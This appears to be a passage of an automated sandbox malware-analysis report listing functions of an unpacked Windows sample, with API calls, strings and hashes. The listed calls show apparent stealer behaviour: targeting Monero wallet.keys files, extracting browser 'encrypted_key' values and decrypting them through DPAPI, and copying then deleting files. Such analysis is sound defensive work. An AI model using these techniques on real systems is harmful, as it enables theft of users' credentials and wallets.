Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 38fb588ec4c8132e712136c4591cfeec6200d6a660f25a7328275bb4d29cdbcb
Instruction ID: b6db8303ff9402c75579f3de1252758f973a4da46735dcc06000f010e46d3a7a
Opcode Fuzzy Hash: 38fb588ec4c8132e712136c4591cfeec6200d6a660f25a7328275bb4d29cdbcb
Instruction Fuzzy Hash: 97113DB1A44249EBD710CBD4DD89FABBBB8FB44B10F104159F615EB380D77468018BA2

Function 008A12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A12B4
RtlAllocateHeap.NTDLL(00000000), ref: 008A12BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 008A12D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008A12F5
RegCloseKey.ADVAPI32(?), ref: 008A12FF

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 4880c900c6c29f6c3e15e035f9f0250bd78fe447346f3cc662a8bc412488e86f
Instruction ID: b4beb1bd30de63aba92cba24637eccb040bff4d8b7e7fc01788f7fea64f2753e
Opcode Fuzzy Hash: 4880c900c6c29f6c3e15e035f9f0250bd78fe447346f3cc662a8bc412488e86f
Instruction Fuzzy Hash: F201E1B9A40248BFDB14DFE4DC89FAEB7B8EB58701F108159FA05DB280D675AA018F51

Function 008AA0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(012790A8,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 008AA0BD
LoadLibraryA.KERNEL32(0127DA58), ref: 008AA146

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Part of subcall function 008BA820: lstrlen.KERNEL32(008A4F05,?,?,008A4F05,008C0DDE), ref: 008BA82B
Part of subcall function 008BA820: lstrcpy.KERNEL32(008C0DDE,00000000), ref: 008BA885

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

SetEnvironmentVariableA.KERNEL32(012790A8,00000000,00000000,?,008C12D8,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,008C0AFE), ref: 008AA132

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 008AA0B2, 008AA0C6, 008AA0DC

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: a7f05580b01100bd4dd745772c0223fe8b243c29146ed39f45ed35d08c538d71
Instruction ID: 4d784a85149cfb344ece674672c603ea8db03122ff4dc06b8a586ca988661434
Opcode Fuzzy Hash: a7f05580b01100bd4dd745772c0223fe8b243c29146ed39f45ed35d08c538d71
Instruction Fuzzy Hash: A1415FB1901244AFDB08DFE8ECD5BAA37B4FB2A301F044128F505DB6A0DB346946DB63

Function 008AA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

Part of subcall function 008B8B60: GetSystemTime.KERNEL32(008C0E1A,0127A8D8,008C05AE,?,?,008A13F9,?,0000001A,008C0E1A,00000000,?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008B8B86

Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008AA2E1
lstrlen.KERNEL32(00000000,00000000), ref: 008AA3FF
lstrlen.KERNEL32(00000000), ref: 008AA6BC

Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6

DeleteFileA.KERNEL32(00000000), ref: 008AA743

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 662cf083c430ce6b2ad4bc0e6cd0e28509677f2a7640e586237929617a5beb23
Instruction ID: 787b59fe31fa1b89e2f1b66dd5cacb5f82a68d23ae1f9e658e4f808d3abd339e
Opcode Fuzzy Hash: 662cf083c430ce6b2ad4bc0e6cd0e28509677f2a7640e586237929617a5beb23
Instruction Fuzzy Hash: D0E1D272810118AADB19EBA8DC95EEE7338FF14300F508169F516F65A1EF346A49CB63

Function 008AD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

Part of subcall function 008B8B60: GetSystemTime.KERNEL32(008C0E1A,0127A8D8,008C05AE,?,?,008A13F9,?,0000001A,008C0E1A,00000000,?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008B8B86

Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008AD801
lstrlen.KERNEL32(00000000), ref: 008AD99F
lstrlen.KERNEL32(00000000), ref: 008AD9B3
DeleteFileA.KERNEL32(00000000), ref: 008ADA32

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 81749409cf4a65ca49e0fe3a215e5f25bf723f64dfe92410cb1ca42bd7edc2ba
Instruction ID: ec17dd6886e4e3e6ab18a573ad27262d9815e75d38dd93768981ca07108ab827
Opcode Fuzzy Hash: 81749409cf4a65ca49e0fe3a215e5f25bf723f64dfe92410cb1ca42bd7edc2ba
Instruction Fuzzy Hash: BF81D171910118AADB18FBA8DC95DEE7738FF54300F504528F516F66A1EF346A09CB63

Function 008AF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6

Part of subcall function 008A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008A99EC
Part of subcall function 008A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008A9A11
Part of subcall function 008A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 008A9A31
Part of subcall function 008A99C0: ReadFile.KERNEL32(000000FF,?,00000000,008A148F,00000000), ref: 008A9A5A
Part of subcall function 008A99C0: LocalFree.KERNEL32(008A148F), ref: 008A9A90
Part of subcall function 008A99C0: CloseHandle.KERNEL32(000000FF), ref: 008A9A9A

Part of subcall function 008B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008B8E52

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,008C1580,008C0D92), ref: 008AF54C
lstrlen.KERNEL32(00000000), ref: 008AF56B

Strings

^userContextId=4294967295, xrefs: 008AF59C
moz-extension+++, xrefs: 008AF5AD

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 9d76a927ada62843fde9cd47392782203b558327e938cb67021356e0b75d7784
Instruction ID: 91ee6652cf26b3acac2a6209f6b02ea7436b11169f96aacc78db03d3c7f5e102
Opcode Fuzzy Hash: 9d76a927ada62843fde9cd47392782203b558327e938cb67021356e0b75d7784
Instruction Fuzzy Hash: 6051D075D10108AADB18FBA8DC96DED7778FF54300F408528F916E7691EE346A09CBA3

Function 008A9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Part of subcall function 008A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008A99EC
Part of subcall function 008A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008A9A11
Part of subcall function 008A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 008A9A31
Part of subcall function 008A99C0: ReadFile.KERNEL32(000000FF,?,00000000,008A148F,00000000), ref: 008A9A5A
Part of subcall function 008A99C0: LocalFree.KERNEL32(008A148F), ref: 008A9A90
Part of subcall function 008A99C0: CloseHandle.KERNEL32(000000FF), ref: 008A9A9A

Part of subcall function 008B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008B8E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 008A9D39

Part of subcall function 008A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008A4EEE,00000000,00000000), ref: 008A9AEF
Part of subcall function 008A9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,008A4EEE,00000000,?), ref: 008A9B01
Part of subcall function 008A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008A4EEE,00000000,00000000), ref: 008A9B2A
Part of subcall function 008A9AC0: LocalFree.KERNEL32(?,?,?,?,008A4EEE,00000000,?), ref: 008A9B3F

Part of subcall function 008A9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 008A9B84
Part of subcall function 008A9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 008A9BA3
Part of subcall function 008A9B60: LocalFree.KERNEL32(?), ref: 008A9BD3

Strings

DPAPI, xrefs: 008A9D89
, xrefs: 008A9DC1
"encrypted_key":", xrefs: 008A9D30

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
